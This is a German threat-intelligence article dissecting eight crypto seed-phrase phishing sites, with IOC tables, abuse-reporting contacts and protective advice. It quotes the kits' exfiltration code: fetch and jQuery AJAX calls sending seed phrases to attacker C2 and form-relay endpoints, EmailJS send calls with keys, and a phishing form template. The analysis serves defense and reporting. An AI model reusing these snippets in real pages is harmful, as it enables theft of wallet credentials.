
Anatomie des Krypto-Phishings:
8 echte Angriffe unter der Lupe
Wir haben Live-Possibly phishing-Datenverkehr abgefangen, fünf Seed-Phrase-Stealer rückentwickelt und gestohlene Daten zu [REDACTED]-Bots, EmailJS-Konten und „Possibly phishing-as-a-Service“-Backends zurückverfolgt.
Was wir herausgefunden haben
Jeden Tag verlieren Tausende von Kryptowährungsnutzern ihr Geld an Possibly phishing-Seiten, die von seriösen Wallet-Diensten nicht zu unterscheiden sind. Aber was passiert dann? hinter Die gefälschte Schaltfläche „Connect Wallet“? Wohin geht deine Seed-Phrase eigentlich?
Wir haben den Live-HTTP-Datenverkehr von fünf aktiven Possibly phishing-Websites abgefangen, deren vollständigen Quellcode heruntergeladen und jeden Endpunkt der Datenexfiltration bis zu seinem endgültigen Ziel zurückverfolgt. Diese Untersuchung deckt die gesamte Funktionsweise des modernen Krypto-Phishings auf – von den Social-Engineering-Tricks, die Sie dazu bringen, Ihre Seed-Phrase einzugeben, bis hin zum [REDACTED]-Bot, der diese in Echtzeit an den Angreifer übermittelt.
Alle in diesem Artikel aufgeführten Seed-Phrasen sind zufällig generierte Testdaten. Bei dieser Untersuchung wurden keine echten Zugangsdaten kompromittiert. Alle Websites wurden ihren jeweiligen Hosting-Anbietern und den für Missbrauchsfälle zuständigen Stellen gemeldet.
Das universelle Angriffsmuster
Trotz unterschiedlicher Markenbezeichnungen und Backends folgen alle 8 Possibly phishing-Seiten dem genau derselbe psychologische Trichter:
Die entscheidende Erkenntnis: Die Animation „Wird verbunden…“ ist immer so programmiert, dass es fehlschlägt. Im Quellcode von Website Nr. 4 haben wir Folgendes gefunden: const success = false — Es wird kein Versuch unternommen, eine Verbindung zur Wallet herzustellen. Der gesamte Ablauf dient ausschließlich dazu, die Opfer zum Formular „Manuell verbinden“ zu leiten.
Die 8 Standorte: Eine vollständige Übersicht
Identitätsbetrug
Ein fiktives „dezentrales Protokoll“ zur Wallet-Validierung. Verwendet Live-Kursticker von CryptoCompare und Links zu echten Blockchain-Explorern (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano), um Glaubwürdigkeit zu vermitteln. Die Landingpage zeigt über 100 Wallet-Logos und einen dreistufigen „Validierungsprozess“.
Die doppelte Exfiltrationskette
Das ausgefeilteste Backend aller fünf – jede gestohlene Anmeldedaten wird über zwei unabhängige Kanäle gleichzeitig:
Victim submits seed phrase
|
+--> Channel 1: axios POST --> Express.js on [REDACTED]
| |
| +--> [REDACTED] Bot API --> @metatech2 (instant DM)
|
+--> Channel 2: fetch POST --> EmailJS API
|
+--> Bestgrace309@gmail.com (email backup) OSINT-Ergebnisse
| Indikator | Wert |
|---|---|
| Betrüger-E-Mail | Bestgrace309@gmail.com |
| [REDACTED]-Bot | @DewdropsTG_bot (ID: 7567323692) |
| [REDACTED]-Empfänger | @metatech2 (Chat-ID: 7350941887) |
| Backend | [REDACTED] |
| EmailJS-Dienst | service_d5qigxs / template_7bqxeaa |
| Versteckte Domäne | layerschain.in (aus der CF-E-Mail-Verschleierung) |
| Gesendete Nachrichten | 1.824+ (aus der [REDACTED]-Nachrichten-ID) |
| Domain-Alter | 2 Tage (TLS: 25. März 2026) |
Die E-Mail-Adresse des Angreifers wurde in einer JavaScript-Kommentar innen config.js: // Bestgrace309@gmail.com. Sie haben vergessen, es vor der Bereitstellung zu entfernen. Zudem ist das [REDACTED]-Relay-Backend völlig offen – keine Authentifizierung, keine Ratenbegrenzung. Durch das Dekodieren von IANA #1910 data-cfemail Neben der Verschleierung im HTML-Code haben wir auch eine versteckte E-Mail-Adresse entdeckt: support@layerschain.in, mit Anbindung an Hosting-Infrastrukturen in Indien und Südafrika.
Identitätsbetrug
Eine pixelgenaue Nachbildung der Realität Aqualibre (AQLA) Seite zur Token-Migration. Der HTML-Code enthält ein Metadaten-Tag, das die Quelle angibt: data-scrapbook-source="https://token.[REDACTED]/migration", datiert auf den 19. November 2024.
Der Zero-Code-Ansatz
Für diesen Angriff sind folgende Voraussetzungen erforderlich: kein serverseitiger Code. Das Formular sendet die Daten direkt an Nicht statisch — ein legitimes Formular-Backend für statische Websites. Jede Eingabe wird an die E-Mail-Adresse des Betrügers weitergeleitet. Die E-Mail-Adresse des Angreifers lautet im Quellcode nie sichtbar.
<form action="https://forms.[REDACTED]/forms/c78173e2d991...94c3f76">
<textarea name="phrase"></textarea>
<input name="private-key" />
<textarea name="keystore-json"></textarea>
<input name="password" />
</form>
IANA #1910 Pages: kostenlos. Un-static Forms: kostenlos. Keine Domains gekauft. Keine Server gemietet. Gesamtkosten für die Infrastruktur: null Dollar.
Identitätsbetrug
Die Subdomain enthält „safpal" — eine absichtliche falsche Schreibweise von [REDACTED], eine beliebte Hardware-Wallet. Die Website gibt sich als „Blockchain Wallet Rectification“ aus und enthält 26 gefälschte Themenkategorien. Sie nutzt Typed.js, um die Namen der Blockchains (Ethereum, BSC, Polygon…) zu animieren, sowie einen LiveCoinWatch-Ticker, um Glaubwürdigkeit zu vermitteln.
Gleiche Ausrüstung, gleicher Bediener?
Verwendet das genau dieselbe Possibly phishing-Vorlage wie Standort Nr. 2:
identisch connect.html, identisch wallets.html mit über 60 Logos, demselben Un-static-Backend (unterschiedliche Formular-IDs — 6f1b82c3...da9943af). Die identische Ausstattung lässt stark vermuten, dass ein Betreiber, der beide Standorte betreibt.
Fehler im Code: „Privay Policy“ (es fehlt ein „c“), „seperated“ (muss „separated“ heißen), „Kestore“ (es fehlt ein „y“). Das Passwortfeld verwendet type="text" anstatt type="password".
Identitätsbetrug
Ein nahezu perfekter Nachbau des Flare-Netzwerk Portal – eine echte Layer-1-EVM-Blockchain mit den Protokollen FTSO und Data Connector. Repliziert über 30 Ökosystempartner, die Navigation und das Branding. Favicons werden von einer Typosquat-Domain geladen: [REDACTED] (ein „n“ fehlt in „mainnet“).
Doppelte Redundanz bei EmailJS
Die einzige Website, die zwei separate EmailJS-Konten gleichzeitig zur Redundanz gegen eine Abschaltung:
// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4
// Channel 2: jQuery AJAX direct
$.ajax('https://api.[REDACTED]/api/v1.0/email/send', {
data: { service_id: 'service_isy47de',
template_id: 'template_dkk4d1b',
user_id: 'JsVEgXVcaSTro1etu' }
}) E-Mail-Betreff bei jedem Diebstahl: "New Wallet Details from Flare".
Der HTML-Code enthält Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Lunio PPC-Schutz, und ein Twitter/X-Anzeigen-Pixel. Der Angreifer führt Folgendes aus: bezahlte Werbung um Opfer auf die Possibly phishing-Seite zu leiten und Bot-Klicks herauszufiltern. Das ist kein Hobby – es handelt sich um eine finanzierte Operation mit Analysetools und Werbeausgaben.
Identitätsbetrug
Ein generischer „COIN NODE“-/„Wallet Fix“-Dienst (keine bestimmte Marke). Copyright „Wallet Fix 2022“ – diese Kit-Vorlage ist mindestens 4 Jahre alt. Bilder gehostet auf [REDACTED] (WordPress auf AWS).
Possibly phishing-as-a-Service
Die beunruhigendste Backend-Architektur: eine UUID-basierte Multi-Tenant-API:
POST https://api.[REDACTED]/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data
wallet=[REDACTED]&type=phrase&phrase=buddy+surprise+vapor+river+... Jeder Betrüger erhält einen eigenen UUID-Endpunkt. Ein zentraler Betreiber verwaltet die API, verfolgt die Kampagnen und behält möglicherweise einen Anteil der gestohlenen Gelder ein. Dies ist industrialisierter Kryptodiebstahl — ein „Possibly phishing-as-a-Service“-Modell.
Zugehörige Infrastruktur (größtenteils stillgelegt)
| Domäne | Rolle | Status |
|---|---|---|
| [REDACTED] | Exfiltrations-API | NXDOMAIN |
| [REDACTED] | Favicon-Host | NXDOMAIN |
| [REDACTED] | Logo-Host | NXDOMAIN |
| [REDACTED] | Bild-CDN | Live (AWS) |
Das Backend ist ausgefallen, aber das Das Frontend ist weiterhin in Betrieb auf IANA #1910 Pages. Wenn der Angreifer die Domain erneut registriert [REDACTED], ist die Website sofort wieder betriebsbereit.
Identitätsbetrug
A zweigleisige Vorgehensweise: ein allgemeines „Support-Center“ unter [REDACTED] mit 15 fiktiven Ausgabenkategorien und 39 Geldbörsenmarken sowie einer Pixelgenauer Klon des [REDACTED]-Onboarding-Prozesses bei [REDACTED]-recovery.support auf Replit gehostet – komplett mit Auswahl des Gerätemodells, PIN-Einrichtung und einem Raster für die 24-Wort-Seed-Phrase mit Echte BIP39-Autovervollständigung.
Anti-Scanner-C2-Backend
Die Support-Seite der Wallet sendet gestohlene Daten an [REDACTED]/log — ein maßgeschneiderter nginx/Ubuntu-C2-Server hinter IANA #1910. Das Backend verwirft absichtlich alle GET-Anfragen (gibt den Fehlercode 522 „Timeout“ zurück) und reagiert nur auf POST-Anfragen. Das bedeutet, dass URL-Scanner, Crawler von Google Safe Browsing und Sicherheitsforscher, die den Endpunkt mit GET-Anfragen anpingen, nichts sehen – der C2-Server scheint nicht erreichbar zu sein.
// config.js — C2 config exposed in plaintext
const config = {
serverURL: "https://api.[REDACTED]",
allowedWallets: ["[REDACTED]","solfare","[REDACTED]","[REDACTED]",
"[REDACTED]","[REDACTED]","[REDACTED]","VARA Provisional License","sui","backpack",
"tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;
// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
fetch(serverURL + "/log", {
method: "POST",
headers: {"Content-Type": "application/json"},
body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
})
} Der [REDACTED]-Klon führt ein separates Express.js-Backend direkt auf Replit aus: POST /api/recovery-phrase Sammeln {deviceId, pin, phrase}. Es gibt Folgendes zurück 400 {"error":"Invalid data provided"} bei fehlerhaften Eingaben — um sicherzustellen, dass das Backend live und aktiv validiert gestohlene Daten.
OSINT-Ergebnisse
| Indikator | Wert |
|---|---|
| Frontend (Wallet) | [REDACTED] |
| Frontend ([REDACTED]) | [REDACTED]-recovery.support (34.111.179.208) |
| C2-Backend | [REDACTED] → nginx/1.24.0 Ubuntu |
| C2-IPs | 104.21.60.163 / 172.67.198.35 (IANA #1910) |
| Replit Verify | a43d3852-5304-47af-a61b-f0f6f3912736 |
| Registrar | [REDACTED] ([REDACTED]-recovery.support) |
| Eingesetzt | 9. Januar 2026 (Header „Last-Modified“) |
| Technologiestack | React + Vite + Tailwind v4.1 + Framer Motion |
Das 466 KB große JS-Bundle enthält die vollständige BIP39-Wortliste Bei der Echtzeit-Autovervollständigung wurden 67 Verweise auf „Passphrase“ und 39 auf „Mnemonic“ gefunden. Der [REDACTED]-Klon führt die Opfer durch genau denselben Einrichtungsablauf wie ein echtes [REDACTED]-Gerät – die überzeugendste Possibly phishing-Seite in dieser gesamten Untersuchung. Die apiKey Das Feld in der Konfiguration schlägt eine Multi-Tenant-PaaS-Architektur.
Identitätsbetrug
Ein generisches „dezentrales Launchpad“ mit 21 Köderkategorien (Staking, Migration, KYC, Gewinnspiel, Belohnungen einlösen, Wiederherstellung von Vermögenswerten, Vorverkauf, NFTs prägen, gesperrte Konten...) und Über 70 Geldbörsenmarken — eine der umfassendsten Wallet-Listen, die uns begegnet sind. Der verräterische Tippfehler „Sychronize“ (das fehlende „n“) entlarvt die Fälschung.
Die FormSubmit-Pipeline
Verwendungszwecke FormSubmit.co — ein seriöser Formular-zu-E-Mail-Dienst. Der Endpunkt-Hash a2cf4131f1a5d39453c7c183df96f86f ist ein MD5-Hash der E-Mail-Adresse des Betrügers. Wir haben Hunderte von E-Mail-Mustern bei Gmail, Yahoo, Hotmail, ProtonMail, Yandex und [REDACTED] per Brute-Force-Angriff durchprobiert — kein Treffer. Der Betrüger verwendet eine ungewöhnliche oder zufällig generierte E-Mail-Adresse.
// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
method: "POST",
dataType: "JSON",
data: {
dappWord: seedPhrase, // THE STOLEN SEED PHRASE
dappName: walletName, // Which wallet was selected
linkName: "DAPP DECENTRALIZED" // Campaign identifier
}
}); OSINT-Ergebnisse
| Indikator | Wert |
|---|---|
| Domäne | [REDACTED] |
| Formular-Absendungs-Hash | a2cf4131f1a5d39453c7c183df96f86f |
| Kampagnen-ID | DAPP DEZENTRALISIERT |
| FontAwesome-Kit | bdc3291137 (Bausatz Nr. 112310842, kostenlos, Version 6.7.2) |
| jQuery | 3.2.1 + 3.5.1 gleichzeitig geladen |
| Bootstrap | CSS 5.2.2 + JS 5.3.0-alpha1 (Inkompatibilität) |
FontAwesome-Kit bdc3291137 — FontAwesome kann den Kontoinhaber hinter dieser Kit-ID identifizieren. Das Kampagnen-Tag DAPP DECENTRALIZED könnte auf anderen Possibly phishing-Seiten erscheinen, die denselben FormSubmit-Hash verwenden. Nach dem Diebstahl der Seed-Phrase kann ein gefälschter QR-Code und zufälliger 7-stelliger Referenzcode Es wird folgende Meldung angezeigt: „Wenden Sie sich mit Ihrem individuellen Referenzcode an den Administrator“ – wodurch die Opfer warten müssen, anstatt dass Ermittlungen eingeleitet werden.
Identitätsbetrug
Unbekannt – sowohl das Frontend als auch das Backend sind offline. Der Struktur der Nutzlast nach zu urteilen handelte es sich um einen Stealer für die Seed-Phrase einer Krypto-Wallet. Der Öffentlicher IANA #1910-R2-Bucket (Objektspeicher, nicht Pages) ist ein gut dokumentierter Possibly phishing-Vektor mit über 5.000 identifizierten schädlichen Seiten und einem von Netskope gemeldeten 61-fachen Anstieg des Datenverkehrs.
Die „Script-Kiddie“-Konfiguration
Am meisten primitive Operation in dieser Sammlung. Die Seed-Phrasen werden gesendet Wort für Wort zu einem PHP-Skript, das auf einem Heimcomputer oder einem VPS hinter einem kostenlosen dynamischen DNS läuft:
POST [REDACTED]/fuc.php
Content-Type: application/x-www-form-urlencoded
pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
+%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
+%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
+%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access OSINT-Ergebnisse
| Indikator | Wert |
|---|---|
| Frontend | pub-519769e9eb634616b1746c2018641d56.r2.dev [OFFLINE] |
| Backend | [REDACTED] [NXDOMAIN] |
| R2-Eimer-ID | 519769e9eb634616b1746c2018641d56 |
| DDNS-Anbieter | [REDACTED] / [REDACTED] (Cincinnati, Ohio) |
| DNS NS | ns10–[REDACTED] |
| Benutzername | mercifuljigga4real123 |
„Merciful“ + „jigga“ (Jay-Zs Spitzname) + „4real“ + „123“ – ein ganz und gar persönlicher Nutzername, der auf eine Verbundenheit mit der Hip-Hop-Kultur hindeutet. Nicht gefunden auf jeder indexierten Plattform: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch oder [REDACTED]. Wahrscheinlich unter diesem Namen oder ähnlichen Varianten auf [REDACTED], [REDACTED] oder Gaming-Plattformen aktiv. Der Dateiname fuc.php passt zum frechen Stil des Griffs.
7 Methoden, wie Ihre Seed-Phrase gestohlen werden kann
| Verfahren | Standorte | So funktioniert es | Geschwindigkeit | Kosten |
|---|---|---|---|---|
| [REDACTED]-Bot | #1 | Express.js auf [REDACTED] leitet Anfragen an die Bot-API weiter. Der Betrüger erhält umgehend eine Direktnachricht mit den Zugangsdaten. | Echtzeit | $0 |
| EmailJS | #1, #4 | Clientseitiges JavaScript sendet die Daten direkt an die EmailJS-API, die sie an die E-Mail-Adresse des Betrügers weiterleitet. | ~1 Min. | $0 |
| Nicht-statische Formulare | #2, #3 | Standardmäßiges HTML-Formular (POST) an einen legitimen Formular-Dienst, der die übermittelten Daten per E-Mail weiterleitet. | ~1 Min. | $0 |
| FormSubmit.co | #7 | jQuery-AJAX an FormSubmit.co. E-Mail-Adresse hinter einem MD5-Hash verborgen. Kampagne mit dem Tag „DAPP DECENTRALIZED“ versehen. | ~1 Min. | $0 |
| Benutzerdefinierte C2-API | #6 | [REDACTED] leitet Anfragen an die Nginx/Express-API hinter IANA #1910 weiter. Lässt GET-Anfragen fallen (522) um Scanner zu umgehen. Reagiert nur auf POST. | Echtzeit | ~5 $/Monat |
| PHP + DDNS | #8 | PHP-Skript auf einem Heimcomputer über einen kostenlosen Dynamic-DNS-Dienst ([REDACTED]). Die Seed-Phrase wird Wort für Wort gesendet. | Echtzeit | $0 |
| PhaaS-API | #5 | UUID-basierte Multi-Tenant-API. Ein zentraler Betreiber verwaltet das Backend, Betrüger mieten Endpunkte. | Echtzeit | Unbekannt |
7 Warnzeichen, die jede Possibly phishing-Seite entlarven
Wenn du siehst, dass irgendein In diesen Fällen schließen Sie die Registerkarte sofort:
Echte Wallet-Verbindungen nutzen das WalletConnect-Protokoll oder Browser-Erweiterungen. Bei ihnen wird niemals die Fehlermeldung „Verbindung fehlgeschlagen“ angezeigt, bei der Sie aufgefordert werden, Ihre Seed-Phrase einzugeben.
Jedes Wallet-Symbol führt zum gleichen Formular. Ein echter Dienst würde das jeweilige SDK der einzelnen Wallets integrieren.
Der gefälschte „503-Fehler“ oder „Unbekannter Fehler“ nach dem Absenden ist beabsichtigt. Ihre Daten wurden bereits gestohlen – der Fehler soll Sie dazu verleiten, es mit einer anderen Wallet erneut zu versuchen.
Alle 5 Websites nutzen die kostenlose Version von IANA #1910 Pages missbräuchlich. Eine Identitätsprüfung ist nicht erforderlich. Der Missbrauch von IANA #1910 Pages für Possibly phishing-Angriffe stieg im Jahr 2025 um 198 % an.
Kein seriöser Dienst benötigt alle drei Arten von Anmeldedaten. Dieses Formular mit drei Registerkarten ist ein typisches Merkmal eines Possibly phishing-Kits.
Keine dieser Seiten wird geladen ethers.js, web3.jsoder RPC-Aufrufe ausführen. Es handelt sich um reine HTML-Formulare, die vorgeben, dApps zu sein.
Kostenloses Hosting + kostenlose Formular-Dienste + kostenlose Nachrichtenfunktion = eine komplette Possibly phishing-Aktion für 0 $. Wenn die Website keine echte Domain hat, sollten Sie misstrauisch sein.
Vollständige IOC-Tabelle
Für Sicherheitsteams, Threat-Intelligence-Plattformen und Personen, die Missbrauch melden:
Domains und Infrastruktur
| Domäne | Typ | Status |
|---|---|---|
| [REDACTED] | Possibly phishing-Frontend | Live |
| [REDACTED] | Possibly phishing-Frontend | Live |
| [REDACTED] | Possibly phishing-Frontend | Live |
| [REDACTED] | Possibly phishing-Frontend | Live |
| [REDACTED] | Possibly phishing-Frontend | Live |
| [REDACTED] | TG-Relais-Backend | Live |
| [REDACTED] | Typosquat-Assets | Unbekannt |
| layerschain.in | Verwandte Domäne | DNS ausgefallen |
| [REDACTED] | PhaaS-Backend | NXDOMAIN |
| [REDACTED] | Asset-Host | NXDOMAIN |
| [REDACTED] | Logo-Host | NXDOMAIN |
| [REDACTED] | Bild-CDN | Live (AWS) |
| [REDACTED] | Possibly phishing-Frontend | Live |
| [REDACTED]-recovery.support | [REDACTED]-Possibly phishing (Replit) | Live |
| [REDACTED] | C2-Backend (nginx/Ubuntu) | Live |
| [REDACTED] | Stammdomäne | 404 |
| [REDACTED] | Possibly phishing-Frontend | Live |
| pub-519769e9eb634616b1746c2018641d56.r2.dev | Possibly phishing (R2-Bucket) | Offline |
| [REDACTED] | PHP-Backend (DDNS) | NXDOMAIN |
Konten und Kennungen
| Typ | Wert | Standort |
|---|---|---|
| Bestgrace309@gmail.com | #1 | |
| E-Mail (verborgen) | support@layerschain.in | #1 |
| [REDACTED]-Bot | @DewdropsTG_bot (7567323692) | #1 |
| [REDACTED]-Nutzer | @metatech2 (7350941887) | #1 |
| EmailJS Nr. 1 | service_d5qigxs / I-7q0Bs-ilK3rFcWj | #1 |
| EmailJS Nr. 2 | service_6dt5h1k / Sza6lhzA9hKHrm1k4 | #4 |
| EmailJS #3 | service_isy47de / JsVEgXVcaSTro1etu | #4 |
| Nicht-statische Form | c78173e2d991...94c3f76 | #2 |
| Nicht-statische Form | 6f1b82c3ce55...da9943af | #3 |
| PhaaS-UUID | a26db20c-1dc4-4208-a60a-c2c3b22c02ef | #5 |
| GTM | GTM-WX2D2TR | #4 |
| MS Clarity | j4bllybjkp | #4 |
| Render-Instanz | rndr-id: ed83576e-b1b3-4c82 | #1 |
| Replit Verify | a43d3852-5304-47af-a61b-f0f6f3912736 | #6 |
| Formularübermittlung MD5 | a2cf4131f1a5d39453c7c183df96f86f | #7 |
| Kampagnen-Tag | DAPP DEZENTRALISIERT | #7 |
| FontAwesome-Kit | bdc3291137 (Bausatz Nr. 112310842) | #7 |
| R2-Eimer-ID | 519769e9eb634616b1746c2018641d56 | #8 |
| Benutzername/DDNS | mercifuljigga4real123 | #8 |
Wo kann man Krypto-Possibly phishing melden?
| Service | Was ist zu melden? | Wie |
|---|---|---|
| IANA #1910 | 7x .pages.dev + 1x R2-Bucket | abuse.IANA #1910.com |
| Google Safe Browsing | Alle Possibly phishing-URLs | Possibly phishing melden |
| PhishTank | Alle URLs für die Community-Blockliste | [REDACTED] |
| EmailJS | 3 missbrauchte Konten (Service-IDs siehe oben) | abuse@emailjs.com |
| Nicht statisch | 2 Endpunkte des Formulars | Kontakt über [REDACTED] |
| [REDACTED] | [REDACTED]-Relay-Backend | Formular zur Meldung von Missbrauch anzeigen |
| [REDACTED] | @DewdropsTG_bot + @metatech2 | [REDACTED].org/support |
| Google (Gmail) | Bestgrace309@gmail.com | Google-Missbrauch melden |
| Twitter/X | Anzeigenkonto zur Bewerbung von Website Nr. 4 | Missbrauch bei X-Anzeigen melden |
| FormSubmit.co | Hash a2cf4131... (#7) | Formular zum Melden von Missbrauch absenden |
| Replit | [REDACTED]-recovery.support (#6) | Missbrauch bei Replit melden |
| [REDACTED] | Registrar für [REDACTED]-recovery.support | Missbrauch bei [REDACTED] |
| DNSExit | [REDACTED] | [REDACTED] – Missbrauch |
| FontAwesome | Bausatz bdc3291137 (#7) | Missbrauch von FontAwesome |
| Chainabuse | Alle Possibly phishing-Kampagnen | [REDACTED] |
So schützen Sie sich
Kein seriöser Dienst wird Sie jemals auffordern, Ihre Seed-Phrase auf einer Website einzugeben. Seed-Phrasen werden ausschließlich bei der Wiederherstellung der Wallet in die offizielle Wallet-Software eingegeben – niemals auf Websites von Drittanbietern, die „Validierung“, „Synchronisierung“ oder „Wiederherstellung“ anbieten.
Bevor Sie eine Wallet verbinden:
- Stellen Sie sicher, dass die URL mit der offiziellen Domain übereinstimmt. Überprüfen Sie die Angaben zum SSL-Zertifikat.
- Real WalletConnect verwendet einen QR-Code oder einen Deep Link – niemals ein Seed-Phrase-Formular.
- Wenn die „Verbindung fehlschlägt“ und Sie aufgefordert werden, Ihre Zugangsdaten manuell einzugeben – dann handelt es sich um Possibly phishing.
- Überprüfen Sie verdächtige URLs unter PhishTank oder VirusTotal bevor man mit jemandem in Kontakt tritt.
- Verwenden Sie eine Hardware-Wallet – diese erfordert bei jeder Transaktion eine physische Bestätigung.
- Speichern Sie offizielle URLs als Lesezeichen. Klicken Sie niemals auf Links in Anzeigen, Direktnachrichten oder sozialen Medien.
Die Taxonomie des Krypto-Phishings
Seed-Phrase-Diebe sind nur eine Kategorie. Hier ist ein Überblick über das gesamte Spektrum des Krypto-Phishings – wir werden zu jeder Art ausführliche Einblicke hinzufügen.
Die unbequeme Wahrheit
Die Kosten für die Einrichtung einer Krypto-Possibly phishing-Aktion betragen $0 und dauert unter 30 Minuten. Kostenloses Hosting, kostenlose Formular-Dienste, kostenlose Messaging-Bots. Der Angreifer hinter Website Nr. 1 hat bereits Anmeldedaten von 1.824+ Opfer. Standort Nr. 4 ist in Betrieb bezahlte Werbung in großem Maßstab. Das ist kein Amateurkram – das ist eine ganze Branche. Die einzige Verteidigung ist Aufklärung.
Helft uns, uns zu wehren
THE ENABLERS REGISTRY spürt Krypto-Possibly phishing-Seiten in Echtzeit auf und meldet sie. Wenn Sie auf eine verdächtige Seite gestoßen sind, melden Sie sie uns – wir werden der Sache nachgehen und uns dafür einsetzen, dass sie offline genommen wird.